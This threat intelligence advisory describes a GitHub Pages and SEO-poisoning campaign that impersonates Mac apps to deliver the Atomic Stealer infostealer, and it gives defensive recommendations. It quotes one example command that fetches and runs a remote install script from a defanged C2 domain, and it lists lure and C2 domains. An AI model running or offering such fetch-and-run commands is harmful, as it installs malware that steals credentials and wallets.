Malwarebytes, LastPass, & Others Impersonated in GitHub-Based Mac Malware Operation

In September 2025, threat intelligence teams at LastPass and Malwarebytes identified a large-scale macOS-targeted malware campaign leveraging GitHub Pages and SEO manipulation to distribute Atomic Stealer (AMOS). Cybercriminals are impersonating over 100 legitimate applications, redirecting users to malicious installers that silently deploy infostealer malware. This campaign poses significant risk to organizations relying on Mac endpoints and highlights the expanding abuse of open-source platforms for malware delivery.

Severity: High

Threat Details

1. Attack Vector:

• GitHub Pages are being weaponized to host lookalike repositories that imitate official software downloads for macOS.
• The cybercriminals use SEO poisoning to push their fake GitHub pages to the top of search results on platforms like Google and Bing.
• When a user searches for legitimate software like “Malwarebytes for Mac,” a malicious GitHub repository might appear as one of the first results.
• The fraudulent pages are designed to look authentic, often mimicking the branding and appearance of the real company.

2. The Malware: Atomic Stealer (AMOS):

• The primary payload in this campaign is the Atomic Stealer, a sophisticated malware specifically designed to target macOS.
• It is capable of exfiltrating: Keychain data, Browser-stored passwords, Crypto wallet data, System profiling data.

3. Impersonated Software

• Security: LastPass, Malwarebytes, SentinelOne, 1Password
• Finance: Robinhood, Citibank, Fidelity, Bitpanda, E-TRADE
• Productivity: Notion, Obsidian, Basecamp, Dropbox
• Multimedia: DaVinci Resolve, Audacity, After Effects
• Others: Docker, Shopify, Charles Schwab, VSCO

Full list includes more than 100 impersonated apps from various industries.

4. Attack Flow

1. User searches for “Install [App] on Mac”
2. Clicks GitHub link (e.g., github[.]com/LastPass-on-MacBook)
3. Redirect to external site (e.g., macprograms-pro[.]com)
4. Site instructs user to run terminal command (curl + bash)
5. Payload downloaded from C2 (e.g., bonoud[.]com, gosreestr[.]com)
6. “install.sh” silently downloads and installs Atomic Stealer

Example Execution Command:

/bin/bash -c “$(curl -fsSL https://gosreestr[.]com/hun/install.sh)”

Recommendations

1. Train employees and users to never install software from GitHub repositories unless they are from official vendor or developer accounts.
2. Warn users to never run curl…|bash or similar commands copied from unofficial pages or forums even if they are on seemingly legitimate GitHub pages.
3. Encourage users to avoid clicking sponsored search results for software downloads.
4. Always navigate to software vendors through direct URLs or official app stores.
5. Scan Mac systems for signs of infection:
   • Look for suspicious shell scripts in /tmp, ~/Library/LaunchAgents, and startup paths.
   • Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
   • Use a known clean recovery image if compromise is suspected. After reinstalling, check for additional rogue extensions, crypto wallet apps, and system modifications.
   • Force password resets for any accounts accessed from infected systems. Invalidate browser sessions, tokens, and regenerate API keys.
6. Block the IOCs at their respective controls
   https://www.virustotal.com/gui/collection/56309ba015ad69d3f926a439c3914e8e0b674560166cdc2b7619980d97049603/iocs

Source:

• https://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-and-others-on-github-serve-malware
• https://blog.lastpass.com/posts/attack-targeting-macs-via-github-pages
• https://medium.com/deriv-tech/brewing-trouble-dissecting-a-macos-malware-campaign-90c2c24de5dc

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.